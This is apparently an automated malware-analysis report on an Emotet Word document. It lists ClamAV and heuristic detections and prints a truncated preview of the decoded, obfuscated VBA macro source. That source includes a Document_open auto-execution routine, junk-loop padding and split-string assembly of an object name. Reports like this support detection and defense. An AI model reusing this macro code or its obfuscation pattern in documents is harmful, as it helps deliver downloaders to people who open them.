Verdict: MALICIOUS (Risk Score 202)
Malware Insights
MITRE ATT&CK: T1059.005 (Visual Basic), T1566.001 (Spearphishing Attachment)
The sample is identified as malicious by ClamAV with a specific Emotet signature. Static analysis reveals the presence of VBA macros, including a Document_Open auto-execution macro, which is a common technique for Emotet. The macro's obfuscated nature and truncated script prevent a detailed analysis of its specific actions, but the presence of a Document_Open macro and the Emotet family attribution strongly suggest it's designed to download and execute a secondary payload.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-7473497-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-7473497-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7618 bytes |
SHA-256: 4eb0a6204ead2a81b7a349e14398ad82fab5fd22cadc6ae7c7620b352b43e3e0
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Aojplemq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Gzuokbkyuug, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Ltyncvvwo = 234 + 423
Do While Cikubwvivihv = 1
Hcmhzkjwdl = 3 * Fqdsyasenoww
Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.")
For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh
Bnbajuowvggcm = ("Rerum ad nihil vel.")
Gingzqsy = 223
Next
Uuavxkoiio = Elfrlfbvs
Loop
Ewxdqdei
Ewdbqeofwfve = 234 + 423
Do While Ucwjhgwmvyh = 1
Rdkgxjky = 3 * Hscfaewhrzd
Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.")
For Lzxvhrtl = Favhzrpsxom To Trngalouzizs
Wrljfjwzrb = ("Velit saepe.")
Ndffipzh = 223
Next
Ulszawfr = Chtalegcvuz
Loop
End Sub
Attribute VB_Name = "Jeuwzqvsdrcqz"
Attribute VB_Base = "0{37180A27-35CF-4DD5-8ADF-8363A452C7B0}{65924915-F776-442B-B179-A71421B8A689}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Rgzhzedt"
Function Ypzdgmswtvdol()
Ecpsjpwmt = 234 + 423
Do While Iflpcowzdtqob = 1
Qlrgusoolmu = 3 * Evuphzdzzkfb
Mnnnndwy = ("Et.")
For Nqguqadhjbui = Gckorame To Bbxyhbyfjab
Jiygysjieomg = ("Enim ut vel.")
Hhkijhrspcfz = 223
Next
Oyzzpjbf = Nlzgxmlswiqx
Loop
Ccahqiqatqpii = Aojplemq.Gzuokbkyuug
Xoxcfslhh = 234 + 423
Do While Pkocrnurft = 1
Kkoupcjxomswo = 3 * Llcoewtryqjb
Bqljpnrrywfxb = ("Autem.")
For Sroysigd = Cqtqegapan To Nyfcungih
Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.")
Upfiaghl = 223
Next
Tqotxwchqfk = Xomriamlhe
Loop
Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu
Zcyuqbzhudyk = 234 + 423
Do While Wvxzhtphlfoe = 1
Ibunrqdbman = 3 * Aoxboyme
Vjpfsrtgmsmz = ("In tempora dolor aut amet.")
For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv
Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.")
Jkgqadlqc = 223
Next
Xmwymfrzzqoo = Skfbpvqn
Loop
Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag
Lhsyghafslbi = 234 + 423
Do While Letzvixom = 1
Xdgyuyaelpj = 3 * Hgrkaaarl
Gdjeewwuxkid = ("Ea et.")
For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz
Uphpromjiicnw = ("Magnam.")
Pgxecxxnq = 223
Next
Ntkkyuimxzkb = Ofkffhbrs
Loop
Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq
Yyqtlblmjar = 234 + 423
Do While Usazcqclwva = 1
Bvovtqeuu = 3 * Dwiiuaeoe
Iihvwfbbcqq = ("Quaerat id voluptates quis est.")
For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup
Plpplkfme = ("Dicta.")
Pcryihkdhla = 223
Next
Zavjsxectfr = Enincmvatq
Loop
End Function
Function Ewxdqdei()
Hhahpldlmgytv = 234 + 423
Do While Bdbvsqpntmg = 1
Cpsroosgidlmw = 3 * Nxrrvfnk
Iisthuiee = ("Larry")
For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk
Ujcwmygukzttl = ("Ronnie")
Puyciwrsobfm = 223
Next
Gifyxuvw = Gurqiiogepkv
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
Dxztlkebm = 234 + 423
Do While Ngqkvsvdtavag = 1
Mvopoxnzbmda = 3 * Vpwvlvkkk
Xiaghwsmsyin = ("Sint hic officiis vel.")
For Bagoxrskw = Yfumibldur To Ttpkosinbao
Evmtdnmdvjry = ("Et.")
Wwjcpnmnvh = 223
Next
Rojjyrkr = Zjqecjxky
Loop
Uqdvmpngkfcs = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^b
... (truncated)